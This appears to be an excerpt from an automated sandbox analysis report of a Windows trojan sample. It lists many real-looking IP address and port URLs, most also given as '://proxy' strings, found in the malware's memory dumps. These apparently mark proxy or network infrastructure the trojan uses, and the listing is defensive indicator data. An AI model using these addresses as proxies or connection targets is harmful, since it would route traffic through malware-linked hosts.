                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA879000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA8A3000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD07F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.183.82.221:8197
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.183.82.221:8197://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.213.76.24
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.213.76.24://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.213.76.24:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C853A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.229.79.45:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.229.79.45:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C77C9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C77A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.110.121.90:21776
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C76AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.110.121.90:21776://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.73.102:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.73.102:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.73.104:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.73.104:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.73.99:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.73.99:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.115.79.195:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.115.79.195:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.120.32.135:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.120.32.135:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.126.84.126:22625
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.126.84.126:22625://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7756000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C773F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.197.103.58:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C80CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.197.103.58:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.197.219.74:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.197.219.74:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.236.124.252:10001
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.236.124.252:10001://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.253.53.25
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.253.53.25://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.253.53.25:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.31.197.145:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.31.197.145:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.32.2.193:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.32.2.193:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.37.21.46:41890
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.37.21.46:41890://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.58.103.55:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.58.103.55:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.58.105.153:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.58.105.153:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.88.166.218:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.88.166.218:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.9.32.90:39433
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8ED8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.9.32.90:39433://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.97.190.118:3629
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.97.190.118:3629://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.98.22.224:8181
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.98.22.224:8181://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.98.81.85:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.98.81.85:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.99.2.43:1081
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.99.2.43:1081://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.101.135.89:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.101.135.89:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.12.118.160
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.12.118.160://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.12.118.160:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.125.165.170:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.125.165.170:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.125.165.170:4145x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8FCF000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C91E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.126.89.76:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.126.89.76:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.128.18.27:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.128.18.27:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.130.104.106:33333
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.130.104.106:33333://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.131.29.214:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.131.29.214:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBE93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.131.29.214:4153HJ
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.136.84.200:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.136.84.200:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.184.67.77:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.184.67.77:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.190.192.57:61221
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.190.192.57:61221://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.222.146.125:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.222.146.125:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.222.60.138:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.222.60.138:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.223.63.26:52104
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.223.63.26:52104://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.229.210.50:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.229.210.50:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA839000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA848000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.234.211.79:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA839000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.234.211.79:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.234.232.103:8383
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.234.232.103:8383://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.234.232.103:8383x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.36.13.65:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C63C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.36.13.65:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.38.245.110:55713
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.38.245.110:55713://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.38.5.147:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.38.5.147:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.38.5.224:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.38.5.224:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.38.5.61:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.38.5.61:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.53.221.89:44196
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.53.221.89:44196://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C804E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.55.247.41:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C804E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.55.247.41:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.66.195.114:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.66.195.114:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.72.115.25:31164
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.72.115.25:31164://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.72.82.9:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.72.82.9:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.75.96.18:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.75.96.18:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.8.170.122:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.8.170.122:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.87.144.122:8086
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.87.144.122:8086://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.87.15.141:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.87.15.141:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C668F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.87.230.29:43573
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6674000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.87.230.29:43573://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8267000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.87.250.66:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.87.250.66:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.93.44.53:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.93.44.53:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.93.45.154:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.93.45.154:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.93.45.156:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.93.45.156:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.93.59.42:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.93.59.42:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2A2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA4C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.93.60.70:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA61A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.93.60.70:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.99.160.98:4145
